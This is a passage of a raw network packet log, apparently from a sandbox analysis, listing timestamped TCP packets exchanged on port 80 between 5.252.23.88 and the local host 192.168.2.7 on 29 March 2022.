Mar 29, 2022 06:51:53.427632093 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427649975 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427669048 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427676916 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.427681923 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.427687883 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427706003 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427723885 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427736044 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.427740097 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.427742958 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427758932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427778959 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427797079 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427815914 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427834034 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427853107 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427870035 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427887917 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427906036 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427923918 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427942991 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427947998 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.427952051 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.427959919 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427978039 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.427995920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428014994 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428031921 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428034067 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428037882 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428049088 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428066015 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428085089 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428092003 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428095102 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428102016 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428124905 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428143024 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428159952 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428162098 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428164959 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428179026 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428196907 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428214073 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428232908 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428241014 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428245068 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428251028 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428267956 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428287029 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428304911 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428311110 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428313971 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428323984 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428348064 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428365946 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428375006 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428379059 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428380966 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428385973 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428409100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428416967 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428428888 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428447962 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428457022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428467035 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428486109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428497076 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428503990 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428522110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428529978 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428534031 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428541899 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428560972 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428575993 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428581953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428601027 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428617954 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428628922 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428632975 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428636074 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428653955 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428670883 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428690910 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428700924 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428705931 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428713083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428735971 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428755999 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428771019 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428774118 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428776979 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428798914 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428817034 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428827047 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428831100 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428833961 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428855896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428879023 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.428889036 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428893089 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428924084 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.428927898 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.458977938 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459013939 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459039927 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459078074 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459099054 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459111929 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459121943 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459146976 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459160089 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459163904 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459182024 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459216118 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459238052 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459242105 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459254980 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459289074 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459300995 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459305048 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459330082 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459366083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459382057 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459384918 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459403038 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459438086 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459448099 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459454060 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459475994 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459515095 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459518909 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459523916 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459548950 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459585905 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459589005 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459592104 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459619999 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459656000 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459656000 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459660053 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459692955 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459727049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459731102 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459734917 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459760904 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459798098 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459803104 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459810972 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459831953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459867001 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459873915 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459877014 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459901094 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459934950 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.459959030 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459964037 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.459973097 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460006952 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460031033 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460036039 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460045099 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460062027 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460084915 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460098982 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460123062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460160971 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460175991 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460182905 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460196018 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460235119 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460242987 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460247993 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460273027 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460304022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460306883 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460311890 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460344076 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460381031 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460383892 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460387945 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460422039 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460427046 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460458994 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460500956 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460509062 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460521936 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460539103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460566044 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460596085 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460639000 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460676908 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460680008 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460684061 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460722923 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460747957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460761070 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460787058 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460788965 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460829973 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460844994 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460887909 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460932016 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460941076 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460948944 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.460971117 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.460977077 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461005926 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461040974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461047888 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461051941 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461075068 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461110115 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461117983 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461122036 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461146116 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461179972 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461182117 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461185932 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461215019 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461250067 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461251974 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461256027 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461303949 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461349964 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461352110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461354971 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461402893 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461445093 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461448908 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461451054 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461498976 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461545944 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461553097 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461560965 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461592913 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461635113 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461638927 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461644888 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461684942 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461730957 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461733103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461738110 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461786032 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461833954 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461838961 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461842060 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461885929 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461929083 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461930990 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.461934090 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.461977959 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462029934 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462029934 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462037086 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462076902 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462121010 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462124109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462131023 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462183952 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462204933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462265968 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462318897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462321997 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462327957 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462379932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462397099 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462440014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462493896 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462498903 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462501049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462559938 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462603092 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462608099 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462615967 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462668896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462671041 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462713003 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462754965 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462763071 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462764025 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462805986 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462841988 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462846994 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462851048 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462891102 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.462941885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.462949038 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.492789984 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.492850065 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.492888927 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.492923021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.492928982 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.492944956 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.492948055 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.492968082 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.492969990 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493007898 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493047953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493052959 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493057966 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493088007 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493124962 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493127108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493132114 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493164062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493199110 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493202925 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493202925 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493242025 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493279934 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493283033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493284941 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493323088 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493352890 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493374109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493392944 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493429899 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493482113 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493484974 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493485928 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493586063 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493623018 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493648052 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493664980 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493705034 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493711948 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493774891 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493796110 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493832111 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.493849993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493905067 CEST	49793	80	192.168.2.7	5.252.23.88
